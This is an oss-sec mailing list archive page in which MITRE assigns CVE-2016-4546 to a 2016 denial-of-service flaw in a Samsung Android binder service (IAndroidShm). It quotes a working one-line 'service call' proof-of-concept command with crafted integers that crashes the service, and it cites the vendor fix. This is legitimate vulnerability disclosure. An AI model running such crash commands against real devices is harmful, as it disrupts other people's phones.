oss-sec mailing list archives
Re: CVE request - samsumg android phone com.samsung.android.jam.IAndroidShm binder service DoS
From: cve-assign () mitre org
Date: Thu, 5 May 2016 22:39:11 -0400 (EDT)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
When a app send a evil data to com.samsung.android.jam.IAndroidShm service by service command (Android system command) , can cause to IAndroidShm service crash.
adb shell;
service call com.samsung.android.jam.IAndroidShm 5 i32 917154658 i32 998369275 i32 1652062893 i32 2113420870 i32 1380178743 i32 47342718 i32 543810222 i32 1481030271
Fix: http://security.samsungmobile.com/smrupdate.html#SMR-JAN-2016 SVE-2015-5133: IAndroidShm IAPAService service DoS
A vulnerability without proper exception handling in system services can lead to crash by calling malicious service commands.
Use CVE-2016-4546. If you have additional reports about Samsung software, then oss-security readers might find it useful if you include a reference establishing that the software is open source. For example, we selected an arbitrary Samsung repository of git://opensource.samsung.com/SM-N900P and found a vendor/samsung/common/external/jack/android/AndroidShm.cpp file that may be related. - -- CVE Assignment Team M/S M300, 202 Burlington Road, Bedford, MA 01730 USA [ A PGP key is available for encrypted communications at http://cve.mitre.org/cve/request_id.html ] -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCAAGBQJXLANMAAoJEHb/MwWLVhi2150P/Rz+lyS2h7ZVm90d3Y1V2sSp 8M+zy6rN8YhjOizW2VhAWpf1U0ekDahXV9qDVmjOVxqiP5l3UXPVTb62Ee6zgYjd fGPkYxQDMroqps42ryIg7K5eNsKGO0iZ+tsi8wfdH1wzk+opa6ta45CTqPHUl9vS STi5sZoX2txMXCbfdcGsuudylkVG7y3FbjGw//cT7DcoHHQbWmSF7SmQwcdBzq/c 0Xl67OUOWBKFnNgrLdqifeS6Msa0YW52omLmSMOiLm9/+1jN5bCpfVrwWI78ALeG FxfHi6HiVWZAyHPt894kCnNeynKa8uw2bWAEgy7RiHf42OBNp+15Crzdg2FvpBCa 8WXRgij1+ML7YtPbG0PfBt66rtlSpznlxp7jCeyriiKqsvSyKcS0rxVWNDbinn8g vmApz6CqDAotB/PS4/dAv9EyvPlK/bSPiqmbYE0jDw2UmTKVrjc6DnlD0iSPgE4L y4D6wmFLqSIljFadZVnnHqIGrdqJZQU14yWbw31Fjpp+NdKrMfG2VP/F7ZPPF1Qo Dk+JYGurrooQwbDsEZ/6TTRXNEMfEtQRLHm7xCXzaxTFjwn12rA6jRlje0MoIPqQ 7Qtersx91679csj9cqAXlBbxgTwpFlIv5XqEcZRPiFKYK02NH/y2vyRE/2yCWkjW pU6S7ZescwAX+GAeFsur =GdhJ -----END PGP SIGNATURE-----
Current thread:
- CVE request - samsumg android phone com.samsung.android.jam.IAndroidShm binder service DoS Vinc3nt4H (May 05)
- Re: CVE request - samsumg android phone com.samsung.android.jam.IAndroidShm binder service DoS cve-assign (May 05)